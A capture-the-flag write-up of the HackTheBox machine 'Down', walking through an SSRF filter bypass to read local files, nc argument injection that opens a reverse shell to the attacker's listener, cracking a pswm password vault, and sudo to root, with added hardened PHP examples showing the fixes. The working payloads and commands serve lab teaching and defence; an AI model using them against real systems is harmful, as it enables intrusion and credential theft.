HTB: Down
Initial scan
An nmap scan shows the target with SSH (22) and HTTP (80) open:
```
oxdf@hacky$ nmap -p- --min-rate 10000 10.129.234.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-03 04:25 UTC
Nmap scan report for 10.129.234.87
Host is up (0.093s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
A version scan of those two ports confirms the service details:
```
oxdf@hacky$ nmap -vv -p 22,80 -sCV 10.129.234.87
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Is it down or just me?
...
```
Website analysis
The site's purpose is to check whether another website is online, which makes it an obvious SSRF candidate. Watching the traffic in Burp Proxy, the form posts to index.php, so this is a PHP site.
Directory brute force
A feroxbuster scan turns up nothing of interest:
```
oxdf@hacky$ feroxbuster -u http://10.129.234.87 -x php
...
200      GET       27l       70w      739c http://10.129.234.87/index.php
301      GET        9l       28w      319c http://10.129.234.87/javascript => http://10.129.234.87/javascript/
...
```
File read via SSRF
Bypassing the filter
Attempts to read files with the file:// scheme are filtered. The filter can be bypassed with curl's ability to accept several URLs on one command line, checked locally first:
```
oxdf@hacky$ curl -s http:// file:///etc/hostname
hacky
```
The same trick works against the target in Burp Repeater:
```http
POST /index.php HTTP/1.1
Host: 10.129.234.87
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

url=http:// file:///etc/hostname
```
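The bypass works because the URL field is treated as a fragment of a command line rather than as a single URL, so a space turns one field into two arguments. As an added example (not code from the box or from this writeup's author), here is a hardened version of the "is it down?" check in PHP. It assumes the original interpolated the raw URL into a shell command; the replacement validates the field as one URL, allowlists http/https, refuses non-public addresses, and talks to libcurl directly with protocol restrictions, so no shell and no curl binary are involved. The function names and the constructed test inputs are the example's own.

```php
<?php
// Added example, not the box's own code. Hardened "is it down?" check:
// the URL never touches a shell, and libcurl is limited to http/https.

/** Return the URL if it is a single, acceptable http(s) target, else null. */
function validate_target_url(string $url): ?string
{
    $url = trim($url);

    // Whitespace or control characters can never occur inside one URL;
    // rejecting them closes the "two URLs in one field" trick outright.
    if ($url === '' || preg_match('/[\s\x00-\x1f\x7f]/', $url)) {
        return null;
    }
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Scheme allowlist: file://, gopher://, dict:// and friends are refused.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Embedded credentials are a classic way to confuse host parsing.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    return $url;
}

/** Resolve the host once and refuse loopback, private and reserved ranges. */
function resolve_public_ip(string $host): ?string
{
    $ip = gethostbyname($host);          // returns $host unchanged on failure
    if ($ip === $host && filter_var($host, FILTER_VALIDATE_IP) === false) {
        return null;                     // DNS lookup failed
    }
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) === false ? null : $ip;
}

/** Run the check with libcurl, pinned to the address we already vetted. */
function check_site(string $url): array
{
    $safe = validate_target_url($url);
    if ($safe === null) {
        return ['ok' => false, 'error' => 'rejected URL'];
    }
    $parts = parse_url($safe);
    $host  = $parts['host'];
    $port  = $parts['port'] ?? (strtolower($parts['scheme']) === 'https' ? 443 : 80);
    $ip    = resolve_public_ip($host);
    if ($ip === null) {
        return ['ok' => false, 'error' => 'host not public or unresolvable'];
    }

    $ch = curl_init($safe);
    curl_setopt_array($ch, [
        CURLOPT_NOBODY          => true,    // HEAD is enough for "is it up?"
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_CONNECTTIMEOUT  => 3,
        CURLOPT_TIMEOUT         => 5,
        CURLOPT_FOLLOWLOCATION  => false,   // a redirect could point inward
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Pin the connection to the vetted IP so a DNS answer cannot change
        // between our check and curl's own lookup (DNS rebinding).
        CURLOPT_RESOLVE         => ["$host:$port:$ip"],
    ]);
    curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $error  = curl_error($ch);
    curl_close($ch);

    return ['ok' => $status > 0, 'status' => $status, 'error' => $error];
}

// Constructed inputs, including the payload used in the writeup above.
foreach (['https://example.com', 'http:// file:///etc/hostname',
          'file:///etc/passwd', 'http://127.0.0.1/'] as $candidate) {
    $verdict = validate_target_url($candidate) === null ? 'rejected' : 'accepted';
    printf("%-32s %s\n", $candidate, $verdict);
}
// http://127.0.0.1/ passes the string checks but fails the address check:
var_dump(resolve_public_ip('127.0.0.1'));   // NULL
```

The string-level check alone would still let a loopback URL through, which is why resolve_public_ip() runs before curl and why CURLOPT_RESOLVE pins the connection to that same address; CURLOPT_PROTOCOLS is the belt-and-braces layer that makes a slipped-through file:// URL fail inside libcurl rather than read a file.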
Reading environment variables and source
Dump the web server's environment:
```
oxdf@hacky$ curl 'http://10.129.234.87/index.php' -d 'url=http:// file:///proc/self/environ' -o- -s | sed -n 's:.*<pre>\(.*\)</pre>.*:\1:p' | tr '\000' '\n'
APACHE_RUN_DIR=/var/run/apache2
...
```
Reading the index.php source the same way reveals an expert mode:
```php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
    <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
    </form>';
} else {
    ...
}
```
Expert mode and argument injection
Vulnerability analysis
Expert mode runs `nc -vz $ip $port`. The port is validated only after an intval() conversion, but the raw input is what gets interpolated into the command, which gives argument injection:
```php
$port = trim($_POST['port']);
$port_int = intval($port);                                   // "443 -e /bin/bash" becomes 443 ...
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);    // ... and so passes validation
if ( $valid_ip && $valid_port ) {
    $rc = 255; $output = '';
    $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");       // but the raw $port is used here
    exec($ec . " 2>&1",$output,$rc);
```
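escapeshellcmd() escapes shell metacharacters but leaves spaces and dashes alone, so the extra words in the port field survive as additional nc arguments. As an added example (not the box's own code), the vulnerable pattern from the excerpt above is reproduced beside a hardened version that validates the exact string reaching the command and quotes each argument on its own. It assumes $valid_ip in the original came from FILTER_VALIDATE_IP; the function names and constructed inputs are the example's own.

```php
<?php
// Added example, not the box's own code: the vulnerable validate-one-thing,
// use-another pattern next to a hardened builder.

/** Mirrors the page's logic: validates intval($port), interpolates raw $port. */
function build_nc_command_vulnerable(string $ip, string $port): ?string
{
    $port       = trim($port);
    $port_int   = intval($port);                    // "443 -e /bin/bash" -> 443
    $valid_ip   = filter_var($ip, FILTER_VALIDATE_IP);   // assumed origin of $valid_ip
    $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
    if (!($valid_ip && $valid_port)) {
        return null;
    }
    // escapeshellcmd() does not touch spaces or '-', so the injected
    // words pass straight through as extra arguments.
    return escapeshellcmd("/usr/bin/nc -vz $ip $port");
}

/** Validate the exact strings that reach the command, then quote each one. */
function build_nc_command_hardened(string $ip, string $port): ?string
{
    $ip   = trim($ip);
    $port = trim($port);

    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // FILTER_VALIDATE_INT on the *string* rejects anything that is not a
    // bare integer; the range keeps it a real TCP port.
    $port_int = filter_var($port, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port_int === false) {
        return null;
    }
    // escapeshellarg() single-quotes each value, so even a value that
    // somehow contained a space would remain one argument.
    return '/usr/bin/nc -vz ' . escapeshellarg($ip) . ' '
         . escapeshellarg((string) $port_int);
}

// Constructed inputs: a benign request and the writeup's injection payload.
$cases = [['10.10.14.79', '443'], ['10.10.14.79', '443 -e /bin/bash']];
foreach ($cases as [$ip, $port]) {
    printf("port field %-20s vulnerable: %s\n", json_encode($port),
        build_nc_command_vulnerable($ip, $port) ?? 'rejected');
    printf("%-31s hardened:   %s\n", '',
        build_nc_command_hardened($ip, $port) ?? 'rejected');
}
// The injected case yields "/usr/bin/nc -vz 10.10.14.79 443 -e /bin/bash"
// from the vulnerable builder and "rejected" from the hardened one.
```

Validating the derived $port_int and then using $port is the whole bug; the hardened builder validates the string it will actually use and then quotes it. A further step that removes the shell entirely is to open the TCP connection from PHP itself with fsockopen($ip, $port_int, ...) instead of spawning nc at all.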
Getting a shell
The injection payload is sent from Burp Repeater:
```http
POST /index.php?expertmode=tcp HTTP/1.1
Host: 10.129.234.87
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

ip=10.10.14.79&port=443 -e /bin/bash
```
The listener receives a shell as www-data:
```
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.87 45706
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Privilege escalation
Enumeration and pswm discovery
An encrypted file is found at /home/aleks/.local/share/pswm/pswm:
```
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==
```
Password cracking
The master password is cracked with a custom script or the pswm-decryptor tool:
```
oxdf@hacky$ uv run pswm-decrypt.py -f pswm -w /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
[+] Master Password: flower
[+] Decrypted Data:
+------------+----------+----------------------+
| Alias      | Username | Password             |
+------------+----------+----------------------+
| pswm       | aleks    | flower               |
| aleks@down | aleks    | 1uY3w22uc-Wr{xNHR~+E |
+------------+----------+----------------------+
```
User and root
The recovered password switches to aleks:
```
www-data@down:/var/www$ su - aleks
Password:
aleks@down:~$
```
Check sudo privileges:
```
aleks@down:~$ sudo -l
User aleks may run the following commands on down:
    (ALL : ALL) ALL
```
Get a root shell:
```
aleks@down:~$ sudo -i
root@down:~#
```
Read the root flag:
```
root@down:~# cat root.txt
87bb9869************************
```